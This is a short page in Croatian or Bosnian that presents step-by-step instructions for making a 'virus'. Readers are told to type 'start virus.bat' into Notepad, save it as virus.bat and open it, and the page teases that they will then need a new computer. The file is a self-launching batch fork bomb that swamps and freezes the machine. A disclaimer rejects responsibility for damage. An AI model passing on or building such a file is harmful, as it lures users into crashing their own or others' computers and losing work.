Ako želite novi računar napravite ovaj virus i otvorite ga

1 korak - otvorite notepad (blok za pisanje)
2 korak - upisite start virus.bat
virus.bat
3 korak - spremite kao virus.bat

ZA SVE ŠTETE MI SE OGRAĐUJEMO OD POSLJEDICA
JavaScript Free Code